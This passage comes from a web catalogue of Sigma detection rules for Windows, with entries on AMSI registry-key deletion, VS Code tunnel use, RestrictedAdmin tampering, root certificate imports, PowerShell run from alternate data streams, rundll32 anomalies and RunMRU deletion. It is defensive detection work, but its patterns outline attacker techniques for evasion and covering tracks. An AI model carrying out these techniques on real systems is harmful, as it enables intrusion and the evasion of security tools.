- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
- https://seclists.org/fulldisclosure/2020/Mar/45
author: frack113
date: 2021-06-07
modified: 2025-10-07
tags:
- attack.defense-impairment
- attack.t1685
logsource:
product: windows
category: registry_delete
detection:
selection:
TargetObject|endswith:
- '{2781761E-28E0-4109-99FE-B9D127C57AFE}' # IOfficeAntiVirus
- '{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' # ProtectionManagement.dll
filter_main_defender:
Image|startswith:
- 'C:\ProgramData\Microsoft\Windows Defender\Platform\'
- 'C:\Program Files\Windows Defender\'
- 'C:\Program Files (x86)\Windows Defender\'
Image|endswith: '\MsMpEng.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unlikely
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml
simulation:
- type: atomic-red-team
name: AMSI Bypass - Remove AMSI Provider Reg Key
technique: T1562.001
atomic_guid: 13f09b91-c953-438e-845b-b585e51cac9b
Convert to SIEM query
high
Moderate
High FP
Renamed VsCode Code Tunnel Execution - File Indicator
Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.
view Sigma YAML
title: Renamed VsCode Code Tunnel Execution - File Indicator
id: d102b8f5-61dc-4e68-bd83-9a3187c67377
status: test
description: |
Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.
references:
- https://ipfyx.fr/post/visual-studio-code-tunnel/
- https://badoption.eu/blog/2023/01/31/code_c2.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-25
tags:
- attack.command-and-control
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|endswith: '\code_tunnel.json'
filter_main_legit_name:
# Note: There might be other legitimate names for VsCode. Please add them if found
Image|endswith:
- '\code-tunnel.exe'
- '\code.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
RestrictedAdminMode Registry Value Tampering
Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
view Sigma YAML
title: RestrictedAdminMode Registry Value Tampering
id: d6ce7ebd-260b-4323-9768-a9631c8d4db2
related:
- id: 28ac00d6-22d9-4a3c-927f-bbd770104573 # process_creation
type: similar
status: test
description: |
Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
references:
- https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md
- https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx
author: frack113
date: 2023-01-13
modified: 2024-08-23
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
logsource:
product: windows
category: registry_set
detection:
selection:
TargetObject|endswith: 'System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
RestrictedAdminMode Registry Value Tampering - ProcCreation
Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
view Sigma YAML
title: RestrictedAdminMode Registry Value Tampering - ProcCreation
id: 28ac00d6-22d9-4a3c-927f-bbd770104573
related:
- id: d6ce7ebd-260b-4323-9768-a9631c8d4db2 # Registry
type: similar
status: test
description: |
Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
references:
- https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md
- https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx
- https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
author: frack113
date: 2023-01-13
modified: 2025-08-28
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
logsource:
product: windows
category: process_creation
detection:
selection:
CommandLine|contains|all:
- '\System\CurrentControlSet\Control\Lsa'
- 'DisableRestrictedAdmin'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
Root Certificate Installed From Susp Locations
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
view Sigma YAML
title: Root Certificate Installed From Susp Locations
id: 5f6a601c-2ecb-498b-9c33-660362323afa
status: test
description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
references:
- https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/
- https://learn.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-09
modified: 2023-01-16
tags:
- attack.defense-impairment
- attack.t1553.004
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'Import-Certificate'
- ' -FilePath '
- 'Cert:\LocalMachine\Root'
CommandLine|contains:
- '\AppData\Local\Temp\'
- ':\Windows\TEMP\'
- '\Desktop\'
- '\Downloads\'
- '\Perflogs\'
- ':\Users\Public\'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
High FP
Run PowerShell Script from ADS
Detects PowerShell script execution from Alternate Data Stream (ADS)
view Sigma YAML
title: Run PowerShell Script from ADS
id: 45a594aa-1fbd-4972-a809-ff5a99dd81b8
status: test
description: Detects PowerShell script execution from Alternate Data Stream (ADS)
references:
- https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1
author: Sergey Soldatov, Kaspersky Lab, oscd.community
date: 2019-10-30
modified: 2022-07-14
tags:
- attack.stealth
- attack.t1564.004
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith:
- '\powershell.exe'
- '\pwsh.exe'
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
CommandLine|contains|all:
- 'Get-Content'
- '-Stream'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
Run PowerShell Script from Redirected Input Stream
Detects PowerShell script execution via input stream redirect
view Sigma YAML
title: Run PowerShell Script from Redirected Input Stream
id: c83bf4b5-cdf0-437c-90fa-43d734f7c476
status: test
description: Detects PowerShell script execution via input stream redirect
references:
- https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml
- https://twitter.com/Moriarty_Meng/status/984380793383370752
author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community
date: 2020-10-17
modified: 2021-11-27
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
CommandLine|re: '\s-\s*<'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
Medium FP
RunDLL32 Spawning Explorer
Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way
view Sigma YAML
title: RunDLL32 Spawning Explorer
id: caa06de8-fdef-4c91-826a-7f9e163eef4b
status: test
description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way
references:
- https://redcanary.com/blog/intelligence-insights-november-2021/
author: elhoim, CD_ROM_
date: 2022-04-27
modified: 2022-05-25
tags:
- attack.stealth
- attack.t1218.011
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\rundll32.exe'
Image|endswith: '\explorer.exe'
filter:
ParentCommandLine|contains: '\shell32.dll,Control_RunDLL'
condition: selection and not filter
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
Medium FP
RunMRU Registry Key Deletion - Registry
Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog.
In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.
Adversaries may delete this key to cover their tracks after executing commands.
view Sigma YAML
title: RunMRU Registry Key Deletion - Registry
id: 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55
related:
- id: c11aecef-9c37-45a6-9c07-bc0782f963fd
type: similar
status: experimental
description: |
Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog.
In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.
Adversaries may delete this key to cover their tracks after executing commands.
references:
- https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-09-25
tags:
- attack.stealth
- attack.t1070.003
logsource:
category: registry_delete
product: windows
detection:
selection:
TargetObject|endswith: '\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
condition: selection
falsepositives:
- Unknown
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_delete/registry_delete_runmru/info.yml
Convert to SIEM query
high
Strong
Medium FP
Rundll32 Execution Without CommandLine Parameters
Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
view Sigma YAML
title: Rundll32 Execution Without CommandLine Parameters
id: 1775e15e-b61b-4d14-a1a3-80981298085a
status: test
description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
references:
- https://www.cobaltstrike.com/help-opsec
- https://twitter.com/ber_m1ng/status/1397948048135778309
author: Florian Roth (Nextron Systems)
date: 2021-05-27
modified: 2023-08-31
tags:
- attack.stealth
- attack.t1202
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|endswith:
- '\rundll32.exe'
- '\rundll32.exe"'
- '\rundll32'
filter:
ParentImage|contains:
- '\AppData\Local\'
- '\Microsoft\Edge\'
condition: selection and not filter
falsepositives:
- Possible but rare
level: high
Convert to SIEM query
Showing 451-500 of 763